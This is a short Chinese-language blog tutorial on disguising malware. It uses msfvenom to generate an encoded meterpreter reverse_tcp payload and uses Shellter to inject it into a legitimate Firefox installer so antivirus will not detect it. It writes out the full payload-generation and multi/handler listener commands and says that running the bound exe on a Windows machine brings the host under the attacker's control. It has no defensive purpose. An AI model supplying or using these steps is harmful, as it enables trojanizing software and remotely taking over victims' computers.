使用Metasploit&Shellter 捆绑免杀

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用

Shellter

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。

准备

  • 使用kali linux
  • 安装 shellter apt install shellter 或者 官网下载

1.使用Metasploit生成 payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw

2.使用Shellter选择捆绑exe文件

  • 目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例

3.把 fud.raw 注入到exe程序

4.启动Metasploit监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit

* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线

  • 杀毒引擎扫描结果

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏腾讯云安全的专栏

刚需 |Wannacry 勒索蠕虫病毒用户修复指引

22150
来自专栏Python中文社区

突发 |“永恒之蓝”漏洞紧急应对方案

專 欄 ❈ 七夜,Python中文社区专栏作者,信息安全研究人员,比较擅长网络安全、逆向工程、Python爬虫开发、Python Web开发。 Github:h...

24870
来自专栏FreeBuf

揭秘来自中国的数字货币“挖矿”军团 – Bondnet僵尸网络

最近,以色列安全公司GuardiCore发现了一个名为Bondnet的僵尸网络,该僵尸网络由数万台被控制的具备不同功率的服务器肉鸡组成。从目前的情况来看,幕后运...

261100
来自专栏机器学习算法与Python学习

诈勒索病毒席卷全球99个国家,做到这些让你免遭勒索!(最新策略)

5月12日,全球范围内99个国家遭到大规模网络攻击,被攻击者被要求支付比特币解锁。其中英国的 NHS 服务受到了大规模的网络攻击,至少 40 家医疗机构内网被黑...

28750
来自专栏FreeBuf

新勒索软件“Defray”可通过Microsoft Word文档传播

? 我们最初观察到该勒索病毒的命令和控制(C&C)服务器主机名为:“defrayable-listings[.]000webhostapp[.]com”。因此...

37470
来自专栏魏艾斯博客www.vpsss.net

NSA Shadow Brokers 漏洞预警附解决方案

14650
来自专栏Python与爬虫

这个漏洞,等你来玩!

https://ropsten.etherscan.io/address/0x39171828d0c6d072c19f5d32900e30343c296f38

8120
来自专栏二次元

程序员日常中病毒系列

事情是这样的,一朋友发来源码让我看下,手残不小心点到里头的一个exe文件,弹出联网请求,我便迅速关掉,之后发现同目录多了一个伪装成系统音乐文件夹的exe可执行...

15000
来自专栏web007

工行b2c

2.商户按照工行B2C支付1.0.0.11接口形成提交数据,并使用工行提供API和商户证书对订单数据签名,形成form表单返回客户浏览器,表单action地址指...

33800
来自专栏Laoqi's Linux运维专列

Shell脚本配合iptables屏蔽来自某个国家的IP访问

16820

扫码关注云+社区

领取腾讯云代金券